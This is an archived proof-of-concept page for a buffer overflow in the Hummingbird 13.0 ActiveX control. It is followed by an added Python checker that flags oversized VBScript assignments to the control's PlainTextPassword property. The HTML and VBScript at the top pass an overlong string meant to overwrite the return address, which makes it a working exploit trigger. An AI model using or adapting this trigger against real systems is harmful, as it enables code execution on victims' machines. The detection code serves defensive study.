Hummingbird 13.0 - ActiveX Remote Buffer Overflow (PoC)
<html>
<!--
The latest version of this ActiveX (13.0) is compiled with /GS; earlier versions aren't.
The XXXX would have overwritten the return address.
by thomas.pollet@gmail.com
-->
<object classid='clsid:FFB6CC68-702D-4FE2-A8E7-4DE23835F0D2' id='target' ></object>
<script language='vbscript'>
arg1="001101220123012401250126012701280129012:012;012<012=012>012?012@012A012B012C012D012E012FXXXX"
target.PlainTextPassword = arg1
</script>
</html>
# milw0rm.com [2008-10-16]
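
A defensive check for the pattern this PoC uses, as an added example that is not part of the original advisory: it scans HTML for an `<object>` bound to the CLSID above and flags script assignments of long string literals to `PlainTextPassword`. The 64-character threshold, the function name and the sample page are assumptions constructed for illustration.

```python
import re
from html.parser import HTMLParser

# CLSID and property name come from the page; MAX_LEN is an assumed threshold.
CLSID = "FFB6CC68-702D-4FE2-A8E7-4DE23835F0D2"
PROPERTY = "PlainTextPassword"
MAX_LEN = 64

class _Collector(HTMLParser):
    """Collect ids of <object> tags bound to CLSID and the text of each <script>."""
    def __init__(self):
        super().__init__()
        self.ids, self.scripts, self._in_script = set(), [], False
    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "object" and a.get("classid", "").lower() == "clsid:" + CLSID.lower():
            self.ids.add(a.get("id", "").lower())
        elif tag == "script":
            self._in_script = True
            self.scripts.append("")
    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
    def handle_data(self, data):
        if self._in_script:
            self.scripts[-1] += data

_LITERAL = re.compile(r'^\s*(\w+)\s*=\s*"([^"\r\n]*)"', re.M)  # name = "literal"
_ASSIGN = re.compile(r'^\s*(\w+)\.' + PROPERTY + r'\s*=\s*(.+?)\s*$', re.I | re.M)

def find_oversized_assignments(html, max_len=MAX_LEN):
    """Return [(object_id, value_length)] for assignments to PROPERTY above max_len."""
    c = _Collector()
    c.feed(html)
    c.close()
    hits = []
    for script in c.scripts:
        # VBScript names are case-insensitive, so compare in lower case.
        literals = {name.lower(): value for name, value in _LITERAL.findall(script)}
        for obj, expr in _ASSIGN.findall(script):
            quoted = expr.startswith('"') and expr.endswith('"')
            value = expr[1:-1] if quoted else literals.get(expr.lower())
            if obj.lower() in c.ids and value is not None and len(value) > max_len:
                hits.append((obj, len(value)))
    return hits

# Constructed sample page (not the PoC itself): one oversized and one normal assignment.
SAMPLE = ("<object classid='clsid:%s' id='ctl'></object>\n<script language='vbscript'>\n"
          'pw = "%s"\nctl.PlainTextPassword = pw\nctl.PlainTextPassword = "hunter2"\n'
          "</script>" % (CLSID, "A" * 200))
```

Only string literals and variables assigned a literal in the same script block are resolved; values built at run time are not flagged by this check.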